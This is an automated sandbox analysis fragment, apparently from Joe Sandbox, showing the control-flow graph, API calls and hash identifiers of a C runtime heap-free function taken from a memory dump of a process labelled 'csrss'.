                                                                                                                                                                                                                                                                                                                                  control_flow_graph 102 694a87-694a98 call 696254 105 694a9a-694aa1 102->105 106 694b0f-694b14 call 696299 102->106 107 694aa3-694abb call 699b99 call 699bcc 105->107 108 694ae6 105->108 120 694abd-694ac5 call 699bfc 107->120 121 694ac6-694ad6 call 694add 107->121 110 694ae7-694af7 HeapFree 108->110 110->106 113 694af9-694b0e call 694a2f GetLastError call 6949ed 110->113 113->106 120->121 121->106 127 694ad8-694adb 121->127 127->110
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.4117166937.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%